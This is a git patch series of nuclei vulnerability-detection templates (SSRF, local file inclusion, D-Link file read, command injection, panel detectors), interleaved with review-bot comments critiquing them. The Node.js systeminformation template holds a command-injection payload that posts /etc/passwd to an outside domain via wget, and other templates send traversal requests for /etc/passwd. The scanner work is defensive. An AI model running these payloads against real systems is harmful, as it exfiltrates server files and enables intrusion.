| 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml index 0ae70321ea..0f16811c2a 100644 --- a/cves/2021/CVE-2021-27132.yaml +++ b/cves/2021/CVE-2021-27132.yaml @@ -24,6 +24,6 @@ requests: - "Content-Disposition: attachment;filename=test.txt" - "Set-Cookie:CRLFInjection=Test" - "Location: example.com" - - "X-XSS-Proection:0" + - "X-XSS-Protection:0" part: header condition: and From 3e1c8309ebdcf12cbb662966de8f1fcb9fe6aa09 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 2 Mar 2021 09:53:18 +0700 Subject: [PATCH 166/370] :fire: Add CVE-2020-26948 --- cves/2020/CVE-2020-26948.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2020/CVE-2020-26948.yaml diff --git a/cves/2020/CVE-2020-26948.yaml b/cves/2020/CVE-2020-26948.yaml new file mode 100644 index 0000000000..5c325dc865 --- /dev/null +++ b/cves/2020/CVE-2020-26948.yaml 
@@ -0,0 +1,27 @@ +id: CVE-2020-26948 + +info: + name: Emby Server SSRF + author: dwisiswant0 + severity: critical + reference: https://github.com/btnz-k/emby_ssrf + description: Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter. + tags: cve,cve2020,emby,jellyfin,ssrf + +requests: + - method: GET + path: + - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://burpcollabolator.net" + matchers-condition: and + matchers: + - type: status + status: + - 500 + - type: word + words: + - "Name or service not known" + part: body + - type: word + words: + - "text/plain" + part: header From 5b690a90036edf3c0470338c41376e984e99843b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 12:36:11 +0530 Subject: [PATCH 167/370] improving matcher --- cves/2021/CVE-2021-27330.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-27330.yaml b/cves/2021/CVE-2021-27330.yaml index f51b0d1a6b..d3ba02aaa5 100644 --- a/cves/2021/CVE-2021-27330.yaml +++ b/cves/2021/CVE-2021-27330.yaml @@ -18,7 +18,11 @@ requests: words: - "" part: body - condition: and + + - type: word + words: + - "text/html" + part: header - type: status status: From 3293ab8b6187dd709696a4868281e29d74591d20 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 07:13:49 +0000 Subject: [PATCH 168/370] Auto Update README [Tue Mar 2 07:13:49 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index be95c2aa0a..df3348bee0 100644 --- a/README.md +++ b/README.md 
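Review bot: The `ImageURL` value `http://burpcollabolator.net` is a misspelling of a real vendor's domain, and detection depends on the target failing to resolve it (`Name or service not known`); whoever registers that name turns the template into a false negative and receives the server-side requests from every vulnerable host it is run against. A name under the reserved `.invalid` TLD (RFC 2606), which can never resolve, produces the same resolver error deterministically — for example `ImageURL=http://example.invalid` (constructed); [PATCH 170/370] further down changes the name to `notburpcollaborator.net`, which is still a registrable domain with the same problem. `Name or service not known` is also the glibc resolver's wording; a server on another libc or OS reports a different message, so the body matcher is platform-dependent and may be worth relaxing to the 500 plus `text/plain` checks alone, or to a regex covering the common resolver strings.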
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 215 | vulnerabilities | 104 | exposed-panels | 89 | +| cves | 216 | vulnerabilities | 104 | exposed-panels | 89 | | exposures | 55 | technologies | 47 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 649 files**. +**68 directories, 650 files**. From e93a9282933f016c383ed7c12e9203d7d2107f58 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 2 Mar 2021 13:18:13 +0530 Subject: [PATCH 169/370] CMSimple 3.1 - Local File Inclusion --- cves/2008/CVE-2008-2650.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2008/CVE-2008-2650.yaml diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml new file mode 100644 index 0000000000..e318728053 --- /dev/null +++ b/cves/2008/CVE-2008-2650.yaml @@ -0,0 +1,23 @@ +id: CVE-2008-2650 +info: + name: CMSimple 3.1 - Local File Inclusion + author: pussycat0x + severity: high + reference: https://www.exploit-db.com/exploits/5700 + tags: cve,cve2008,lfi +requests: + - raw: + - | + GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1 + Content-Type: application/x-www-form-urlencoded + matchers-conditions: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" + part: body + + From 3a9620837d3b9ba7a4bae1fc0cb083c0833562c3 Mon Sep 17 00:00:00 2001 
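Review bot: In `cves/2008/CVE-2008-2650.yaml` the key `matchers-conditions: and` is misspelled (`matchers-condition`), so the condition is ignored and the two matchers fall back to the default OR, meaning any `200` response satisfies the template regardless of the `root:` regex; [PATCH 173/370] below corrects it, and [PATCH 172/370] removes the two trailing blank lines after `part: body`. The raw request has no `Host: {{Hostname}}` line; unless the engine adds one, the request is not valid HTTP/1.1, and the `Content-Type` header serves no purpose on a body-less GET. `info` runs straight into `requests:` with no separating blank line, which is a style point only.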
From: Prince Chaddha Date: Tue, 2 Mar 2021 13:22:26 +0530 Subject: [PATCH 170/370] Update CVE-2020-26948.yaml --- cves/2020/CVE-2020-26948.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-26948.yaml b/cves/2020/CVE-2020-26948.yaml index 5c325dc865..54d281ece9 100644 --- a/cves/2020/CVE-2020-26948.yaml +++ b/cves/2020/CVE-2020-26948.yaml @@ -11,7 +11,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://burpcollabolator.net" + - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net" matchers-condition: and matchers: - type: status From bfefc14a43efca307dc4cf6f95176f43057bfb18 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 07:54:38 +0000 Subject: [PATCH 171/370] Auto Update README [Tue Mar 2 07:54:38 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index df3348bee0..a0ce0a4f40 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 216 | vulnerabilities | 104 | exposed-panels | 89 | +| cves | 217 | vulnerabilities | 104 | exposed-panels | 89 | | exposures | 55 | technologies | 47 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 650 files**. +**68 directories, 651 files**. From 395609c4ec5ed1c27ebea096e6a230047fe01a19 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Tue, 2 Mar 2021 13:34:01 +0530 Subject: [PATCH 172/370] Update CVE-2008-2650.yaml --- cves/2008/CVE-2008-2650.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml index e318728053..10e56ebc16 100644 --- a/cves/2008/CVE-2008-2650.yaml +++ b/cves/2008/CVE-2008-2650.yaml @@ -18,6 +18,4 @@ requests: - type: regex regex: - "root:[x*]:0:0:" - part: body - - + part: body From b5adaf7d3de5fccbc8d04964241076abb273977e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 14:02:36 +0530 Subject: [PATCH 173/370] updated typo --- cves/2008/CVE-2008-2650.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml index 10e56ebc16..aa427af7be 100644 --- a/cves/2008/CVE-2008-2650.yaml +++ b/cves/2008/CVE-2008-2650.yaml @@ -10,7 +10,8 @@ requests: - | GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1 Content-Type: application/x-www-form-urlencoded - matchers-conditions: and + + matchers-condition: and matchers: - type: status status: From d7ff8ecfbafefcdf5b7cb042791de607b41d6e56 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 08:36:20 +0000 Subject: [PATCH 174/370] Auto Update README [Tue Mar 2 08:36:20 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a0ce0a4f40..c8c24a5186 100644 --- a/README.md +++ b/README.md 
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 217 | vulnerabilities | 104 | exposed-panels | 89 | +| cves | 218 | vulnerabilities | 104 | exposed-panels | 89 | | exposures | 55 | technologies | 47 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 651 files**. +**68 directories, 652 files**. From 5e355e2141612c5be9dbc7d4362b24579e44f8e0 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 14:08:58 +0530 Subject: [PATCH 175/370] misc updates --- .github/ISSUE_TEMPLATE/false-positive.md | 4 ++-- .github/ISSUE_TEMPLATE/submit-template.md | 7 ++++--- 2 files changed, 6 insertions(+), 5 deletions(-) diff --git a/.github/ISSUE_TEMPLATE/false-positive.md b/.github/ISSUE_TEMPLATE/false-positive.md index 2b64abc50f..866365bd95 100644 --- a/.github/ISSUE_TEMPLATE/false-positive.md +++ b/.github/ISSUE_TEMPLATE/false-positive.md @@ -1,8 +1,8 @@ --- name: False Positive about: 'Create an issue if you found false positive results. ' -title: "[false-positive] " -labels: '' +title: "[false-positive] template-name " +labels: 'false-positive' assignees: '' --- diff --git a/.github/ISSUE_TEMPLATE/submit-template.md b/.github/ISSUE_TEMPLATE/submit-template.md index a682945ed5..c929e00068 100644 --- a/.github/ISSUE_TEMPLATE/submit-template.md +++ b/.github/ISSUE_TEMPLATE/submit-template.md 
@@ -1,14 +1,15 @@ --- name: Submit Template about: Submit nuclei template using issue -title: "[nuclei-template] " -labels: '' +title: "[nuclei-template] template-name" +labels: 'nuclei-template' assignees: '' --- **Template Details** -``` +```yaml + nuclei template goes here ``` From c56ba051655cd36792033d7d3b446f768323624b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 14:20:19 +0530 Subject: [PATCH 176/370] Update CVE-2021-27330.yaml --- cves/2021/CVE-2021-27330.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-27330.yaml b/cves/2021/CVE-2021-27330.yaml index d3ba02aaa5..2af387092f 100644 --- a/cves/2021/CVE-2021-27330.yaml +++ b/cves/2021/CVE-2021-27330.yaml @@ -4,7 +4,7 @@ info: name: Triconsole 3.75 XSS author: pikpikcu severity: medium - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27330 + reference: https://www.exploit-db.com/exploits/49597 tags: cve,cve2021,triconsole,xss requests: From 723ea552852894d5ffba506097a59dd6d929c3ed Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 2 Mar 2021 11:02:08 +0000 Subject: [PATCH 177/370] Create CVE-2021-21315.yaml --- cves/2021/CVE-2021-21315.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-21315.yaml diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml new file mode 100644 index 0000000000..472a39ab34 --- /dev/null +++ b/cves/2021/CVE-2021-21315.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2021-21315 + +info: + name: Node.js Systeminformation Command Injection + author: pikpikcu + severity: high + reference: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC + tags: node.js,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcolaborator.net)" + + matchers-condition: and + matchers: + + - type: word + words: + - "application/json" + part: header + + - type: word + words: + - "wget --post-file /etc/passwd burpcolaborator.net" + part: body + condition: and + + - type: status + status: + - 200 From 50de7f79cfa44dcb49a5fa7b0f87befe2dc23dc9 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 2 Mar 2021 18:32:14 +0700 Subject: [PATCH 178/370] Create exposed-hg.yaml --- exposures/configs/exposed-hg.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 exposures/configs/exposed-hg.yaml diff --git a/exposures/configs/exposed-hg.yaml b/exposures/configs/exposed-hg.yaml new file mode 100644 index 0000000000..471370bb53 --- /dev/null +++ b/exposures/configs/exposed-hg.yaml @@ -0,0 +1,18 @@ +id: exposed-hg + +info: + name: Exposed HG Directory + author: daffainfo + severity: medium + +requests: + - method: GET + path: + - "{{BaseURL}}/.hg/hgrc" + + matchers: + - type: word + words: + - "[paths]" + - "default" + condition: and From 8756096ecc6f017accf97524d8fd3106e05254ad Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 18:00:32 +0530 Subject: [PATCH 179/370] Adding hivemanager-login-panel --- exposed-panels/hivemanager-login-panel.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 exposed-panels/hivemanager-login-panel.yaml diff --git a/exposed-panels/hivemanager-login-panel.yaml b/exposed-panels/hivemanager-login-panel.yaml new file mode 100644 index 0000000000..2877cb5e9d --- /dev/null 
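Review bot: The `name[]` value `$(wget --post-file /etc/passwd burpcolaborator.net)` is a live command that, on a vulnerable host, uploads the server's `/etc/passwd` to a domain the template authors do not control (and whose spelling is wrong), so running this detector exfiltrates data from every affected target to a third party. The body matcher only checks that the literal string is reflected in the JSON, which demonstrates reflection rather than execution, so the same signal is available with a payload that has no side effect; the check should be rewritten around a side-effect-free indicator before this is merged. `condition: and` on a matcher with a single word is a no-op and can be dropped. The `node.js` tag contains a dot; `nodejs` would be consistent with the rest of the tag vocabulary, assuming tag parsing treats the dot literally.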
+++ b/exposed-panels/hivemanager-login-panel.yaml @@ -0,0 +1,18 @@ +id: hivemanager-login-panel +info: + name: HiveManager Login panel + author: binaryfigments + severity: info + +requests: + - method: GET + path: + - '{{BaseURL}}/hm/login.action' + matchers-condition: and + matchers: + - type: word + words: + - "HiveManager Login" + - type: status + status: + - 200 From 6069f6b5a6ec1874bb94217e97fca5c270222587 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 12:31:03 +0000 Subject: [PATCH 180/370] Auto Update README [Tue Mar 2 12:31:03 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c8c24a5186..8d2e21d071 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 218 | vulnerabilities | 104 | exposed-panels | 89 | +| cves | 218 | vulnerabilities | 104 | exposed-panels | 90 | | exposures | 55 | technologies | 47 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 652 files**. +**68 directories, 653 files**. From 5817aaa5399b687963a8c063ca62a622a6a3176b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 2 Mar 2021 18:39:33 +0530 Subject: [PATCH 181/370] Create sphider-login.yaml --- exposed-panels/sphider-login.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/sphider-login.yaml diff --git a/exposed-panels/sphider-login.yaml b/exposed-panels/sphider-login.yaml new file mode 100644 index 0000000000..806ef216d3 --- /dev/null +++ b/exposed-panels/sphider-login.yaml 
@@ -0,0 +1,25 @@ +id: sphider-login + +info: + name: Sphider Admin Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6641 + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/spider.php' + - '{{BaseURL}}/sphider-search/admin/admin.php' + - '{{BaseURL}}/sphider/admin/admin.php' + - '{{BaseURL}}/search/admin/configset.php' + - '{{BaseURL}}/fileadmin/user_upload/search/admin/auth.php' + + matchers-condition: and + matchers: + - type: word + words: + - 'Sphider Admin Login' + - type: status + status: + - 200 From 85126a1a847a9766b6758f05604a9e76141203ff Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 2 Mar 2021 19:39:19 +0530 Subject: [PATCH 182/370] Create d-link-arbitary-fileread.yaml --- .../d-link-arbitary-fileread.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 misconfiguration/d-link-arbitary-fileread.yaml diff --git a/misconfiguration/d-link-arbitary-fileread.yaml b/misconfiguration/d-link-arbitary-fileread.yaml new file mode 100644 index 0000000000..49306e9ce4 --- /dev/null +++ b/misconfiguration/d-link-arbitary-fileread.yaml @@ -0,0 +1,19 @@ +id: dlink-file-read + +info: + name: D-Link Arbitrary File Read + author: dhiyaneshDK + severity: high + reference: https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html + +requests: + - method: POST + path: + - "{{BaseURL}}/cgi-bin/webproc" + body: 'getpage=html%2Findex.html&errorpage=/var/log/sysevent.txt&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=test&%3Aaction=login&%3Asessionid=365dfaef' + matchers: + - type: word + words: + - "Manufacturer: D-Link" + condition: and + part: body From c3c9becd9b21361dd33a29875d8318bad9b6507c Mon Sep 17 00:00:00 2001 
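Review bot: In `misconfiguration/d-link-arbitary-fileread.yaml` the only matcher looks for `Manufacturer: D-Link` in the body, which identifies the device but says nothing about whether `errorpage=/var/log/sysevent.txt` was actually served, so any D-Link `webproc` response is reported as an arbitrary file read; the check needs an indicator tied to the requested file (the rewrite in [PATCH 190/370] below switches to a `root:` regex and a status matcher, which is the right direction). `condition: and` on a single-word matcher is a no-op. `id: dlink-file-read` does not match the file name, and the file name's `arbitary` is itself a misspelling of `arbitrary`; aligning the two would help. The body also carries hard-coded credentials (`%3Ausername=admin&%3Apassword=test`) and a fixed `sessionid` that play no part in the match; the later rewrite drops them.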
From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 20:16:08 +0530 Subject: [PATCH 183/370] Update sphider-login.yaml --- exposed-panels/sphider-login.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/exposed-panels/sphider-login.yaml b/exposed-panels/sphider-login.yaml index 806ef216d3..35bc2c4e27 100644 --- a/exposed-panels/sphider-login.yaml +++ b/exposed-panels/sphider-login.yaml @@ -10,10 +10,8 @@ requests: - method: GET path: - '{{BaseURL}}/admin/spider.php' - - '{{BaseURL}}/sphider-search/admin/admin.php' - '{{BaseURL}}/sphider/admin/admin.php' - - '{{BaseURL}}/search/admin/configset.php' - - '{{BaseURL}}/fileadmin/user_upload/search/admin/auth.php' + - '{{BaseURL}}/search/admin/admin.php' matchers-condition: and matchers: From 85725c81604b223e4ae2471828686b4d18cd52dd Mon Sep 17 00:00:00 2001 From: Joan Bono Date: Tue, 2 Mar 2021 16:29:08 +0100 Subject: [PATCH 184/370] Create acunetix-panel.yaml --- exposed-panels/acunetix-panel.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/acunetix-panel.yaml diff --git a/exposed-panels/acunetix-panel.yaml b/exposed-panels/acunetix-panel.yaml new file mode 100644 index 0000000000..b5af687d7c --- /dev/null +++ b/exposed-panels/acunetix-panel.yaml @@ -0,0 +1,23 @@ +id: acunetix-panel-detect + +info: + name: Acunetix Panel detector + author: joanbono + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/#/login" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers-condition: and + matchers: + - type: word + words: + - 'Acunetix' + - '' + part: body + - type: status + status: + - 200 From 12f4aa87df327c342fee79a61add99ed4972c449 Mon Sep 17 00:00:00 2001 
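Review bot: In `exposed-panels/acunetix-panel.yaml` the word list `- 'Acunetix'` / `- ''` has no `condition:`, so the matcher defaults to OR; if the second entry really is an empty string (it may be an artifact of rendering, e.g. a stripped HTML tag), it is contained in every body and the template fires on any 200 page. Either remove the empty entry or give the matcher a real second word and `condition: and`. The fixed `User-Agent` header is harmless but is repeated verbatim in the checkmarx and nessus templates of this series; a comment saying why a browser UA is required would help the next maintainer decide whether it can be dropped.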
From: Joan Bono Date: Tue, 2 Mar 2021 16:29:32 +0100 Subject: [PATCH 185/370] Create checkmarx-panel.yaml --- exposed-panels/checkmarx-panel.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 exposed-panels/checkmarx-panel.yaml diff --git a/exposed-panels/checkmarx-panel.yaml b/exposed-panels/checkmarx-panel.yaml new file mode 100644 index 0000000000..f60a778943 --- /dev/null +++ b/exposed-panels/checkmarx-panel.yaml @@ -0,0 +1,18 @@ +id: checkmarx-panel-detect + +info: + name: Checkmarx WebClient detector + author: joanbono + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/cxwebclient/Login.aspx" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers: + - type: word + words: + - '/CxWebClient/webApp/Scripts/libs/authenticationScripts' + part: body From 36a8272b4d3d7308a1efd7c5e8ace07059f7d6d6 Mon Sep 17 00:00:00 2001 From: Joan Bono Date: Tue, 2 Mar 2021 16:29:56 +0100 Subject: [PATCH 186/370] Create nessus-panel.yaml --- exposed-panels/nessus-panel.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/nessus-panel.yaml diff --git a/exposed-panels/nessus-panel.yaml b/exposed-panels/nessus-panel.yaml new file mode 100644 index 0000000000..20c5de9092 --- /dev/null +++ b/exposed-panels/nessus-panel.yaml @@ -0,0 +1,26 @@ +id: nessus-panel-detect + +info: + name: Nessus Panel detector + author: joanbono + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/server/status" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers-condition: and + matchers: + - type: word + words: + - '{"code":200,"progress":null,"status":"ready"}' + part: body + - type: word + words: + - 'NessusWWW' + part: header + - type: status + status: + - 200 From dca16d049205ddc98f5f9661e9e3d891fa709635 Mon Sep 17 00:00:00 2001 
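Review bot: In `exposed-panels/nessus-panel.yaml` the body word `{"code":200,"progress":null,"status":"ready"}` is an exact JSON serialization, so any change in key order, whitespace or the `progress` value breaks the match; the `NessusWWW` header match already identifies the product, and the body check could be relaxed to `"status":"ready"` or a regex. A response that reports a different status (for example while the server is still starting) would also be missed, which may be intended for a panel detector but is worth a comment.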
From: Joan Bono Date: Tue, 2 Mar 2021 16:32:40 +0100 Subject: [PATCH 187/370] Create burp-api-detect.yaml --- technologies/burp-api-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/burp-api-detect.yaml diff --git a/technologies/burp-api-detect.yaml b/technologies/burp-api-detect.yaml new file mode 100644 index 0000000000..4558ae4b04 --- /dev/null +++ b/technologies/burp-api-detect.yaml @@ -0,0 +1,25 @@ +id: burp-rest-api-detect + +info: + name: Burp Rest API Server Running + author: joanbono + severity: info + reference: https://portswigger.net/burp/documentation/enterprise/api-reference + +requests: + - method: GET + path: + - "{{BaseURL}}/v0.1/" + matchers-condition: and + matchers: + - type: word + words: + - 'Burp API' + part: body + - type: word + words: + - 'X-Burp-Version' + part: header + - type: status + status: + - 200 From 8e9cb17c5611370d08ae269efbb0479785a63c1b Mon Sep 17 00:00:00 2001 From: Joan Bono Date: Tue, 2 Mar 2021 16:40:36 +0100 Subject: [PATCH 188/370] Update checkmarx-panel.yaml --- exposed-panels/checkmarx-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/checkmarx-panel.yaml b/exposed-panels/checkmarx-panel.yaml index f60a778943..eb46a385f1 100644 --- a/exposed-panels/checkmarx-panel.yaml +++ b/exposed-panels/checkmarx-panel.yaml @@ -10,7 +10,7 @@ requests: path: - "{{BaseURL}}/cxwebclient/Login.aspx" headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) matchers: - type: word words: From 74faffe02194aa8d654296a450fc909351297636 Mon Sep 17 00:00:00 2001 From: Joan Bono Date: Tue, 2 Mar 2021 16:40:57 +0100 Subject: [PATCH 189/370] Update acunetix-panel.yaml --- exposed-panels/acunetix-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
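Review bot: In `technologies/burp-api-detect.yaml` the `reference` points at the Burp Suite Enterprise API documentation, but the `/v0.1/` path, the `Burp API` page text and the `X-Burp-Version` header look like the user REST API served by Burp Suite Professional, so the reference and `name` may describe the wrong product; this should be confirmed against the documentation before merging. A `description` line naming which API is being detected, and that it is normally bound to localhost, would make the `info` severity easier to judge.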
diff --git a/exposed-panels/acunetix-panel.yaml b/exposed-panels/acunetix-panel.yaml index b5af687d7c..7bcc9503d6 100644 --- a/exposed-panels/acunetix-panel.yaml +++ b/exposed-panels/acunetix-panel.yaml @@ -10,7 +10,7 @@ requests: path: - "{{BaseURL}}/#/login" headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) matchers-condition: and matchers: - type: word From 74e63203b7fe1851befc557e14166f77053ecb9c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 21:14:29 +0530 Subject: [PATCH 190/370] Update d-link-arbitary-fileread.yaml --- misconfiguration/d-link-arbitary-fileread.yaml | 16 +++++++++++----- 1 file changed, 11 insertions(+), 5 deletions(-) diff --git a/misconfiguration/d-link-arbitary-fileread.yaml b/misconfiguration/d-link-arbitary-fileread.yaml index 49306e9ce4..c761312d44 100644 --- a/misconfiguration/d-link-arbitary-fileread.yaml +++ b/misconfiguration/d-link-arbitary-fileread.yaml @@ -10,10 +10,16 @@ requests: - method: POST path: - "{{BaseURL}}/cgi-bin/webproc" - body: 'getpage=html%2Findex.html&errorpage=/var/log/sysevent.txt&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=test&%3Aaction=login&%3Asessionid=365dfaef' + body: 'errorpage=/etc/passwd&obj-action=auth&:action=login' + + matchers-condition: and matchers: - - type: word - words: - - "Manufacturer: D-Link" - condition: and + + - type: regex + regex: + - "root:[x*]:0:0" part: body + + - type: status + status: + - 200 From 9c04590189ed0134be9ab496dfef9b57cd2f51a3 Mon Sep 17 00:00:00 2001 From: Joan Bono Date: Tue, 2 Mar 2021 16:46:51 +0100 Subject: [PATCH 191/370] Update nessus-panel.yaml --- exposed-panels/nessus-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
